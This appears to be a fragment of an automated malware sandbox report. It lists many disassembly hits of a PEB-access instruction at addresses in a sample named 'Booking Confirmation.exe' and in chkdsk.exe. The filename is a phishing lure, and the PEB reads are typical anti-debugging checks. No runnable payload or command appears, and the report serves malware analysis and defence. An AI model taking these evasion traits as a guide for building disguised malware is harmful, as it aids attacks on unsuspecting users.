Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]		5_2_018E7794
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A37F5 mov eax, dword ptr fs:[00000030h]		5_2_018A37F5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A70E mov eax, dword ptr fs:[00000030h]		5_2_0189A70E
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A70E mov eax, dword ptr fs:[00000030h]		5_2_0189A70E
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193070D mov eax, dword ptr fs:[00000030h]		5_2_0193070D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0193070D mov eax, dword ptr fs:[00000030h]		5_2_0193070D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188F716 mov eax, dword ptr fs:[00000030h]		5_2_0188F716
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FFF10 mov eax, dword ptr fs:[00000030h]		5_2_018FFF10
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FFF10 mov eax, dword ptr fs:[00000030h]		5_2_018FFF10
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01864F2E mov eax, dword ptr fs:[00000030h]		5_2_01864F2E
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01864F2E mov eax, dword ptr fs:[00000030h]		5_2_01864F2E
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189E730 mov eax, dword ptr fs:[00000030h]		5_2_0189E730
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187EF40 mov eax, dword ptr fs:[00000030h]		5_2_0187EF40
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187FF60 mov eax, dword ptr fs:[00000030h]		5_2_0187FF60
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938F6A mov eax, dword ptr fs:[00000030h]		5_2_01938F6A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018FFE87 mov eax, dword ptr fs:[00000030h]		5_2_018FFE87
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018E46A7 mov eax, dword ptr fs:[00000030h]		5_2_018E46A7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]		5_2_01930EA5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]		5_2_01930EA5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]		5_2_01930EA5
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01938ED6 mov eax, dword ptr fs:[00000030h]		5_2_01938ED6
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018936CC mov eax, dword ptr fs:[00000030h]		5_2_018936CC
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A8EC7 mov eax, dword ptr fs:[00000030h]		5_2_018A8EC7
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191FEC0 mov eax, dword ptr fs:[00000030h]		5_2_0191FEC0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018776E2 mov eax, dword ptr fs:[00000030h]		5_2_018776E2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018916E0 mov ecx, dword ptr fs:[00000030h]		5_2_018916E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]		5_2_0186C600
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]		5_2_0186C600
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]		5_2_0186C600
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01898E00 mov eax, dword ptr fs:[00000030h]		5_2_01898E00
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A61C mov eax, dword ptr fs:[00000030h]		5_2_0189A61C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0189A61C mov eax, dword ptr fs:[00000030h]		5_2_0189A61C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01921608 mov eax, dword ptr fs:[00000030h]		5_2_01921608
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0186E620 mov eax, dword ptr fs:[00000030h]		5_2_0186E620
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0191FE3F mov eax, dword ptr fs:[00000030h]		5_2_0191FE3F
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]		5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]		5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]		5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]		5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]		5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]		5_2_01877E41
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192AE44 mov eax, dword ptr fs:[00000030h]		5_2_0192AE44
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0192AE44 mov eax, dword ptr fs:[00000030h]		5_2_0192AE44
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0187766D mov eax, dword ptr fs:[00000030h]		5_2_0187766D
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]		5_2_0188AE73
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]		5_2_0188AE73
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]		5_2_0188AE73
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]		5_2_0188AE73
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]		5_2_0188AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8CD6 mov eax, dword ptr fs:[00000030h]		8_2_04DB8CD6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA14FB mov eax, dword ptr fs:[00000030h]		8_2_04DA14FB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]		8_2_04D66CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]		8_2_04D66CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]		8_2_04D66CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF849B mov eax, dword ptr fs:[00000030h]		8_2_04CF849B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7C450 mov eax, dword ptr fs:[00000030h]		8_2_04D7C450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7C450 mov eax, dword ptr fs:[00000030h]		8_2_04D7C450
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A44B mov eax, dword ptr fs:[00000030h]		8_2_04D1A44B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0746D mov eax, dword ptr fs:[00000030h]		8_2_04D0746D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]		8_2_04DB740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]		8_2_04DB740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]		8_2_04DB740D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]		8_2_04DA1C06
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]		8_2_04D66C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]		8_2_04D66C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]		8_2_04D66C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]		8_2_04D66C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1BC2C mov eax, dword ptr fs:[00000030h]		8_2_04D1BC2C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]		8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]		8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]		8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov ecx, dword ptr fs:[00000030h]		8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]		8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]		8_2_04D66DC9
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D98DF1 mov eax, dword ptr fs:[00000030h]		8_2_04D98DF1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFD5E0 mov eax, dword ptr fs:[00000030h]		8_2_04CFD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFD5E0 mov eax, dword ptr fs:[00000030h]		8_2_04CFD5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]		8_2_04DAFDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]		8_2_04DAFDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]		8_2_04DAFDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]		8_2_04DAFDE2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]		8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]		8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]		8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]		8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]		8_2_04CE2D8A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1FD9B mov eax, dword ptr fs:[00000030h]		8_2_04D1FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1FD9B mov eax, dword ptr fs:[00000030h]		8_2_04D1FD9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]		8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]		8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]		8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]		8_2_04D12581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]		8_2_04D11DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]		8_2_04D11DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]		8_2_04D11DB5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D135A1 mov eax, dword ptr fs:[00000030h]		8_2_04D135A1
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB05AC mov eax, dword ptr fs:[00000030h]		8_2_04DB05AC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB05AC mov eax, dword ptr fs:[00000030h]		8_2_04DB05AC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D07D50 mov eax, dword ptr fs:[00000030h]		8_2_04D07D50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D23D43 mov eax, dword ptr fs:[00000030h]		8_2_04D23D43
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D63540 mov eax, dword ptr fs:[00000030h]		8_2_04D63540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0C577 mov eax, dword ptr fs:[00000030h]		8_2_04D0C577
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0C577 mov eax, dword ptr fs:[00000030h]		8_2_04D0C577
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D6A537 mov eax, dword ptr fs:[00000030h]		8_2_04D6A537
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAE539 mov eax, dword ptr fs:[00000030h]		8_2_04DAE539
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]		8_2_04D14D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]		8_2_04D14D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]		8_2_04D14D3B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8D34 mov eax, dword ptr fs:[00000030h]		8_2_04DB8D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]		8_2_04CF3D34
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEAD30 mov eax, dword ptr fs:[00000030h]		8_2_04CEAD30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8ED6 mov eax, dword ptr fs:[00000030h]		8_2_04DB8ED6
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D28EC7 mov eax, dword ptr fs:[00000030h]		8_2_04D28EC7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D9FEC0 mov eax, dword ptr fs:[00000030h]		8_2_04D9FEC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D136CC mov eax, dword ptr fs:[00000030h]		8_2_04D136CC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF76E2 mov eax, dword ptr fs:[00000030h]		8_2_04CF76E2
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D116E0 mov ecx, dword ptr fs:[00000030h]		8_2_04D116E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7FE87 mov eax, dword ptr fs:[00000030h]		8_2_04D7FE87
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D646A7 mov eax, dword ptr fs:[00000030h]		8_2_04D646A7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]		8_2_04DB0EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]		8_2_04DB0EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]		8_2_04DB0EA5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]		8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]		8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]		8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]		8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]		8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]		8_2_04CF7E41
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAAE44 mov eax, dword ptr fs:[00000030h]		8_2_04DAAE44
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DAAE44 mov eax, dword ptr fs:[00000030h]		8_2_04DAAE44
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF766D mov eax, dword ptr fs:[00000030h]		8_2_04CF766D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]		8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]		8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]		8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]		8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]		8_2_04D0AE73
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A61C mov eax, dword ptr fs:[00000030h]		8_2_04D1A61C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A61C mov eax, dword ptr fs:[00000030h]		8_2_04D1A61C
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]		8_2_04CEC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]		8_2_04CEC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]		8_2_04CEC600
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D18E00 mov eax, dword ptr fs:[00000030h]		8_2_04D18E00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DA1608 mov eax, dword ptr fs:[00000030h]		8_2_04DA1608
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D9FE3F mov eax, dword ptr fs:[00000030h]		8_2_04D9FE3F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CEE620 mov eax, dword ptr fs:[00000030h]		8_2_04CEE620
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D237F5 mov eax, dword ptr fs:[00000030h]		8_2_04D237F5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]		8_2_04D67794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]		8_2_04D67794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]		8_2_04D67794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CF8794 mov eax, dword ptr fs:[00000030h]		8_2_04CF8794
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFEF40 mov eax, dword ptr fs:[00000030h]		8_2_04CFEF40
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CFFF60 mov eax, dword ptr fs:[00000030h]		8_2_04CFFF60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB8F6A mov eax, dword ptr fs:[00000030h]		8_2_04DB8F6A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D0F716 mov eax, dword ptr fs:[00000030h]		8_2_04D0F716
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7FF10 mov eax, dword ptr fs:[00000030h]		8_2_04D7FF10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7FF10 mov eax, dword ptr fs:[00000030h]		8_2_04D7FF10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB070D mov eax, dword ptr fs:[00000030h]		8_2_04DB070D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04DB070D mov eax, dword ptr fs:[00000030h]		8_2_04DB070D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A70E mov eax, dword ptr fs:[00000030h]		8_2_04D1A70E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1A70E mov eax, dword ptr fs:[00000030h]		8_2_04D1A70E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE4F2E mov eax, dword ptr fs:[00000030h]		8_2_04CE4F2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE4F2E mov eax, dword ptr fs:[00000030h]		8_2_04CE4F2E
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1E730 mov eax, dword ptr fs:[00000030h]		8_2_04D1E730
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]		8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov ecx, dword ptr fs:[00000030h]		8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]		8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]		8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]		8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]		8_2_04D7B8D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE58EC mov eax, dword ptr fs:[00000030h]		8_2_04CE58EC
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04CE9080 mov eax, dword ptr fs:[00000030h]		8_2_04CE9080
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D63884 mov eax, dword ptr fs:[00000030h]		8_2_04D63884
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D63884 mov eax, dword ptr fs:[00000030h]		8_2_04D63884
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1F0BF mov ecx, dword ptr fs:[00000030h]		8_2_04D1F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1F0BF mov eax, dword ptr fs:[00000030h]		8_2_04D1F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D1F0BF mov eax, dword ptr fs:[00000030h]		8_2_04D1F0BF
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]		8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]		8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]		8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]		8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]		8_2_04D120A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]		8_2_04D120A0
